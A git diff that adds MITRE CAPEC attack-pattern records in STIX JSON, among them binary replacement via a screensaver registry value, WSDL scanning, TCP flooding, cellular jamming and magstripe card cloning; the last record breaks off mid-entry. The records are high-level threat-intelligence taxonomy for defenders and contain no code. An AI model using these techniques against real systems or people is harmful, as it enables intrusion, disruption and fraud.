a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--151ca16b-5acc-45db-bde8-19d204542a54.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--151ca16b-5acc-45db-bde8-19d204542a54.json new file mode 100644 index 0000000000000000000000000000000000000000..c942c35c4028d88495b7b3eab39a245963f15d9b --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--151ca16b-5acc-45db-bde8-19d204542a54.json @@ -0,0 +1,60 @@ +{ + "id": "bundle--812515ca-85bd-4794-a2fc-8d817cb56bc4", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker forces the target into a previous state in order to leverage potential weaknesses in the target dependent upon a prior configuration or state-dependent factors. Even in cases where an attacker may not be able to directly control the configuration of the targeted application, they may be able to reset the configuration to a prior state since many applications implement reset functions.", + "external_references": [ + { + "external_id": "CAPEC-166", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/166.html" + }, + { + "external_id": "CWE-306", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html" + }, + { + "external_id": "CWE-1221", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1221.html" + }, + { + "external_id": "CWE-1232", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1232.html" + } + ], + "id": "attack-pattern--151ca16b-5acc-45db-bde8-19d204542a54", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Force the System to Reset Values", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009" + ], + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_extended_description": "\n Since these functions are usually intended as emergency features to return an application to a stable configuration if the current configuration degrades functionality, they may not be as strongly secured as other configuration options. The resetting of values is dangerous as it may enable undesired functionality, disable services, or modify access controls. At the very least this is a nuisance attack since the administrator will need to re-apply their configuration. At worst, this attack can open avenues for powerful attacks against the application, and, if it isn't obvious that the configuration has been reset, these vulnerabilities may be present a long time before they are notices.\n ", + "x_capec_prerequisites": [ + "The targeted application must have a reset function that returns the configuration of the application to an earlier state.", + "The reset functionality must be inadequately protected against use." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. In some cases, the attacker may need special client applications in order to execute the reset functionality." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb.json new file mode 100644 index 0000000000000000000000000000000000000000..8ff7def5308849372a44f512f6a1fdc8fe6274ae --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb.json @@ -0,0 +1,48 @@ +{ + "id": "bundle--63a226ef-c1b6-4e5c-859d-9cf67a141275", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary creates a client application to interface with a target service where the client violates assumptions the service makes about clients. Services that have designated client applications (as opposed to services that use general client applications, such as IMAP or POP mail servers which can interact with any IMAP or POP client) may assume that the client will follow specific procedures.", + "external_references": [ + { + "external_id": "CAPEC-202", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/202.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + } + ], + "id": "attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Create Malicious Client", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, servers may assume that clients will accurately compute values (such as prices), will send correctly structured messages, and will attempt to ensure efficient interactions with the server. By reverse-engineering a client and creating their own version, an adversary can take advantage of these assumptions to abuse service functionality.\n For example, a purchasing service might send a unit price to its client and expect the client to correctly compute the total cost of a purchase. If the adversary uses a malicious client, however, the adversary could ignore the server input and declare any total price. Likewise, an adversary could configure the client to retain network or other server resources for longer than legitimately necessary in order to degrade server performance. Even services with general clients can be susceptible to this attack if they assume certain client behaviors. However, such services generally can make fewer assumptions about the behavior of their clients in the first place and, as such, are less likely to make assumptions that an adversary can exploit.\n ", + "x_capec_prerequisites": [ + "The targeted service must make assumptions about the behavior of the client application that interacts with it, which can be abused by an adversary." + ], + "x_capec_resources_required": [ + "The adversary must be able to reverse engineer a client of the targeted service. However, the adversary does not need to reverse engineer all client functionality - they only need to recreate enough of the functionality to access the desired server functionality." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de.json new file mode 100644 index 0000000000000000000000000000000000000000..3bbd7707f6485445c2f5f9392da44fda6d593094 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de.json @@ -0,0 +1,71 @@ +{ + "id": "bundle--65b89dec-062b-44d5-b9c4-4edd3f855d57", + "objects": [ + { + "created": "2018-05-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries know that certain binaries will be regularly executed as part of normal processing. If these binaries are not protected with the appropriate file system permissions, it could be possible to replace them with malware. This malware might be executed at higher system permission levels. A variation of this pattern is to discover self-extracting installation packages that unpack binaries to directories with weak file permissions which it does not clean up appropriately. These binaries can be replaced by malware, which can then be executed.", + "external_references": [ + { + "external_id": "CAPEC-642", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/642.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "description": "Server Software Component: Terminal Services DLL", + "external_id": "T1505.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1505/005" + }, + { + "description": "Compromise Client Software Binary", + "external_id": "T1554", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1554" + }, + { + "description": "Hijack Execution Flow:Executable Installer File Permissions Weakness", + "external_id": "T1574.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1574/005" + }, + { + "description": "Binary planting", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Binary_planting" + } + ], + "id": "attack-pattern--15e6b769-4cbd-4c39-b774-b45673fd55de", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Replace Binaries", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The installer for a previous version of Firefox would use a DLL maliciously placed in the default download directory instead of the existing DLL located elsewhere, probably due to DLL hijacking. This DLL would be run with administrator privileges if the installer has those privileges.", + "By default, the Windows screensaver application SCRNSAVE.exe leverages the scrnsave.scr Portable Executable (PE) file in C:\\Windows\\system32\\. This value is set in the registry at HKEY_CURRENT_USER\\Control Panel\\Desktop, which can be modified by an adversary to instead point to a malicious program. This program would then run any time the SCRNSAVE.exe program is activated and with administrator privileges. An adversary may additionally modify other registry values within the same location to set the SCRNSAVE.exe program to run more frequently." + ], + "x_capec_prerequisites": [ + "The attacker must be able to place the malicious binary on the target machine." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12.json new file mode 100644 index 0000000000000000000000000000000000000000..300a0569101823d31f604d236e665607b6bf9b87 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12.json @@ -0,0 +1,72 @@ +{ + "id": "bundle--4e7f1b5c-1c92-42d6-a300-7d3ae232fb7b", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the WSDL interface made available by a web service. The attacker may scan the WSDL interface to reveal sensitive information about invocation patterns, underlying technology implementations and associated vulnerabilities. This type of probing is carried out to perform more serious attacks (e.g. parameter tampering, malicious content injection, command injection, etc.). WSDL files provide detailed information about the services ports and bindings available to consumers. For instance, the attacker can submit special characters or malicious content to the Web service and can cause a denial of service condition or illegal access to database records. In addition, the attacker may try to guess other private methods by using the information provided in the WSDL files.", + "external_references": [ + { + "external_id": "CAPEC-95", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/95.html" + }, + { + "external_id": "CWE-538", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/538.html" + }, + { + "description": "Walid Negm, Anatomy of a Web Services Attack, 2004--03---01, ForumSystems", + "external_id": "REF-554", + "source_name": "reference_from_CAPEC", + "url": "https://www.forumsys.com/wp-content/uploads/2014/01/Anatomy-of-a-Web-Services-Attack.pdf" + }, + { + "description": "Frank Coyle, Seven Steps to XML Mastery, 2006--08---25", + "external_id": "REF-555", + "source_name": "reference_from_CAPEC", + "url": "http://www.informit.com/articles/article.aspx?p=601349" + } + ], + "id": "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12", + "modified": "2021-10-21T00:00:00.000Z", + "name": "WSDL Scanning", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A WSDL interface may expose a function vulnerable to SQL Injection.", + "\n The Web Services Description Language (WSDL) allows a web service to advertise its capabilities by describing operations and parameters needed to access the service. As discussed in step 5 of this series, WSDL is often generated automatically, using utilities such as Java2WSDL, which takes a class or interface and builds a WSDL file in which interface methods are exposed as web services.\n Because WSDL generation often is automated, enterprising adversaries can use WSDL to gain insight into the both public and private services. For example, an organization converting legacy application functionality to a web services framework may inadvertently pass interfaces not intended for public consumption to a WSDL generation tool. The result will be SOAP interfaces that give access to private methods.\n Another, more subtle WSDL attack occurs when an enterprising attacker uses naming conventions to guess the names of unpublished methods that may be available on the server. For example, a service that offers a stock quote and trading service may publish query methods such as requestStockQuote in its WSDL. However, similar unpublished methods may be available on the server but not listed in the WSDL, such as executeStockQuote. A persistent adversary with time and a library of words and phrases can cycle thru common naming conventions (get, set, update, modify, and so on) to discover unpublished application programming interfaces that open doors into private data and functionality.\n Source : \"Seven Steps to XML Mastery, Step 7: Ensure XML Security\", Frank Coyle. See reference section.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Scan for WSDL Documents: The adversary scans for WSDL documents. The WDSL document written in XML is like a handbook on how to communicate with the web services provided by the target host. It provides an open view of the application (function details, purpose, functional break down, entry points, message types, etc.). This is very useful information for the adversary.

Experiment

  1. Analyze WSDL files: An adversary will analyze the WSDL files and try to find potential weaknesses by sending messages matching the pattern described in the WSDL file. The adversary could run through all of the operations with different message request patterns until a breach is identified.

Exploit

  1. Craft malicious content: Once an adversary finds a potential weakness, they can craft malicious content to be sent to the system. For instance the adversary may try to submit special characters and observe how the system reacts to an invalid request. The message sent by the adversary may not be XML validated and cause unexpected behavior.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "A client program connecting to a web service can read the WSDL to determine what functions are available on the server.", + "The target host exposes vulnerable functions within its WSDL interface." + ], + "x_capec_skills_required": { + "Low": "This attack can be as simple as reading WSDL and starting sending invalid request.", + "Medium": "This attack can be used to perform more sophisticated attacks (SQL injection, etc.)" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--172e2289-333b-4796-9afd-94140c9480e8.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--172e2289-333b-4796-9afd-94140c9480e8.json new file mode 100644 index 0000000000000000000000000000000000000000..be8d3f6e4650ea774eccad34a41d1a593a8d7858 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--172e2289-333b-4796-9afd-94140c9480e8.json @@ -0,0 +1,62 @@ +{ + "id": "bundle--fb632286-bed0-4a74-ae90-e9ec86832c47", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the TCP protocol with the intent to deny legitimate users access to a service. These attacks exploit the weakness within the TCP protocol where there is some state information for the connection the server needs to maintain. This often involves the use of TCP SYN messages.", + "external_references": [ + { + "external_id": "CAPEC-482", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/482.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Network Denial of Service: Direct Network Flood", + "external_id": "T1498.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/001" + }, + { + "description": "Endpoint Denial of Service: OS Exhaustion Flood", + "external_id": "T1499.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/001" + }, + { + "description": "Endpoint Denial of Service: Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + } + ], + "id": "attack-pattern--172e2289-333b-4796-9afd-94140c9480e8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "TCP Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of TCP traffic to send to the target port of a functioning server." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8.json new file mode 100644 index 0000000000000000000000000000000000000000..c27005dc6048544ea8f5e9480b656f6d5a05f9ef --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8.json @@ -0,0 +1,47 @@ +{ + "id": "bundle--c6fa0b00-c35f-47b3-a7b9-75c24df549fc", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker actively transmits signals to overpower and disrupt the communication between a cellular user device and a cell tower. Several existing techniques are known in the open literature for this attack for 2G, 3G, and 4G LTE cellular technology. For example, some attacks target cell towers by overwhelming them with false status messages, while others introduce high levels of noise on signaling channels.", + "external_references": [ + { + "external_id": "CAPEC-605", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/605.html" + } + ], + "id": "attack-pattern--17593c9a-d8a0-4ef3-8da1-9d948426bbb8", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Cellular Jamming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7534fc4c-f683-4918-8f62-005e0402d18a" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (The attacker's goal is to prevent users from accessing the cellular network. Denying connectivity to the cellular network prevents the user from being able to transmit or receive any data, which also prevents VOIP calls, however this attack poses no threat to data confidentiality.)" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_prerequisites": [ + "Lack of anti-jam features in cellular technology (2G, 3G, 4G, LTE)" + ], + "x_capec_skills_required": { + "Low": "This attack can be performed by low capability attackers with commercially available tools." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--177d22be-7b76-4726-8085-61756f95c0ce.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--177d22be-7b76-4726-8085-61756f95c0ce.json new file mode 100644 index 0000000000000000000000000000000000000000..79d3ea16cbcecae5d62ab3669b5fed0f4b730e59 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--177d22be-7b76-4726-8085-61756f95c0ce.json @@ -0,0 +1,43 @@ +{ + "id": "bundle--cffc0bf8-c0a4-4cd1-b9ee-11105a7ae7a3", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker is able to discover and query Micro-services at a web location and thereby expose the Micro-services to further exploitation by gathering information about their implementation and function. Micro-services in web pages allow portions of a page to connect to the server and update content without needing to cause the entire page to update. This allows user activity to change portions of the page more quickly without causing disruptions elsewhere.", + "external_references": [ + { + "external_id": "CAPEC-179", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/179.html" + } + ], + "id": "attack-pattern--177d22be-7b76-4726-8085-61756f95c0ce", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Calling Micro-Services Directly", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--ec382da0-af49-489b-bca1-a555d48b7ce3" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n However, these micro-services may not be subject to the same level of security review as other forms of content. For example, a micro-service that posts requests to a server that are turned into SQL queries may not adequately protect against SQL-injection attacks. As a result, micro-services may provide another vector for a range of attacks. It should be emphasized that the presence of micro-services does not necessarily make a site vulnerable to attack, but they do provide additional complexity to a web page and therefore may contain vulnerabilities that support other attack patterns.\n ", + "x_capec_prerequisites": [ + "The target site must use micro-services that interact with the server and one or more of these micro-services must be vulnerable to some other attack pattern." + ], + "x_capec_resources_required": [ + "The attacker usually needs to be able to invoke micro-services directly in order to control the parameters that are used in their attack. The attacker may require other resources depending on the nature of the flaw in the targeted micro-service." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1809fa36-f249-4e55-80ab-26570fd24cab.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1809fa36-f249-4e55-80ab-26570fd24cab.json new file mode 100644 index 0000000000000000000000000000000000000000..7c763c2d32cb1cf015360dc1459ea764465cb5b0 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1809fa36-f249-4e55-80ab-26570fd24cab.json @@ -0,0 +1,41 @@ +{ + "id": "bundle--63b6d632-c794-42a7-b46d-dc5a75e7b1ab", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Data Interchange Protocols are used to transmit structured data between entities. These protocols are often specific to a particular domain (B2B: purchase orders, invoices, transport logistics and waybills, medical records). They are often, but not always, XML-based. Subverting the protocol can allow an adversary to impersonate others, discover sensitive information, control the outcome of a session, or perform other attacks. This type of attack targets invalid assumptions that may be inherent in implementers of the protocol, incorrect implementations of the protocol, or vulnerabilities in the protocol itself.", + "external_references": [ + { + "external_id": "CAPEC-277", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/277.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + } + ], + "id": "attack-pattern--1809fa36-f249-4e55-80ab-26570fd24cab", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Data Interchange Protocol Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c.json new file mode 100644 index 0000000000000000000000000000000000000000..2dc9fbb5a3ea06bef69a810b2a5d62c33b4680d4 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c.json @@ -0,0 +1,71 @@ +{ + "id": "bundle--da5864f2-64ef-4516-8182-bade6fe9bc30", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses a social engineering techniques to produce a sense of obligation in the target to perform a certain action or concede some sensitive or key piece of information. Obligation has to do with actions one feels they need to take due to some sort of social, legal, or moral requirement, duty, contract, or promise. There are various techniques for fostering a sense of obligation to reciprocate or concede during ordinary modes of communication. One method is to compliment the target, and follow up the compliment with a question. If performed correctly the target may volunteer a key piece of information, sometimes involuntarily.", + "external_references": [ + { + "external_id": "CAPEC-418", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/418.html" + }, + { + "description": "The Official Social Engineering Portal, Social-Engineer.org, Tick Tock Computers, LLC", + "external_id": "REF-348", + "source_name": "reference_from_CAPEC", + "url": "http://www.social-engineer.org" + }, + { + "description": "Social Engineering: The Art of Human Hacking, 2010, Wiley", + "external_id": "REF-360", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--180aa01f-65a0-4400-a174-7b0f1605db0c", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Influence Perception of Reciprocation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--af1a9e65-4ca7-4551-b1de-6192539652c5" + ], + "x_capec_consequences": { + "Availability": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Confidentiality": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ], + "Integrity": [ + "Other (Attacks that influence the perception of the target can result in a wide variety of consequences and negatively affect potentially the confidentiality, availability, and/or integrity of an application or system.)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "An adversary develops a relationship with the target to foster a feeling of obligation in them to perform a certain action or concede some information. A perception of obligation/concession means that the target feels they need to behave in some way or perform some sort of action due to being morally or legally bound to do so." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have the means and knowledge of how to communicate with the target in some manner." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "The adversary requires strong inter-personal and communication skills." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--19015961-475c-438b-887b-e3d66a9143de.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--19015961-475c-438b-887b-e3d66a9143de.json new file mode 100644 index 0000000000000000000000000000000000000000..3d9fc3f2176d3eb1de43b42751aaef54d2b90528 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--19015961-475c-438b-887b-e3d66a9143de.json @@ -0,0 +1,40 @@ +{ + "id": "bundle--ac696d25-0337-4b91-a30b-acf7e8052120", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker duplicates the data on a Magnetic strip card (i.e. 'swipe card' or 'magstripe') to gain unauthorized access to a physical location or a person's private information. Magstripe cards encode data on a band of iron-based magnetic particles arrayed in a stripe along a rectangular card. Most magstripe card data formats conform to ISO standards 7810, 7811, 7813, 8583, and 4909. The primary advantage of magstripe technology is ease of encoding and portability, but this also renders magnetic strip cards susceptible to unauthorized duplication. If magstripe cards are used for access control, all an attacker need do is obtain a valid card long enough to make a copy of the card and then return the card to its location (i.e. a co-worker's desk). Magstripe reader/writers are widely available as well as software for analyzing data encoded on the cards. By swiping a valid card, it becomes trivial to make any number of duplicates that function as the original.", + "external_references": [ + { + "external_id": "CAPEC-397", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/397.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--19015961-475c-438b-887b-e3d66a9143de", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Cloning Magnetic Strip Cards", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7.json new file mode 100644 index 0000000000000000000000000000000000000000..669b4c4497189d1aa9ea5f16471d3ab486a44977 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7.json @@ -0,0 +1,104 @@ +{ + "id": "bundle--db94adc9-24f3-4de6-9423-e579a85ebf62", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary who is authorized or has the ability to search known system resources, does so with the intention of gathering useful information. System resources include files, memory, and other aspects of the target system. In this pattern of attack, the adversary does not necessarily know what they are going to find when they start pulling data. This is different than CAPEC-150 where the adversary knows what they are looking for due to the common location.", + "external_references": [ + { + "external_id": "CAPEC-545", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/545.html" + }, + { + "external_id": "CWE-1239", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1239.html" + }, + { + "external_id": "CWE-1243", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1243.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "external_id": "CWE-1272", + 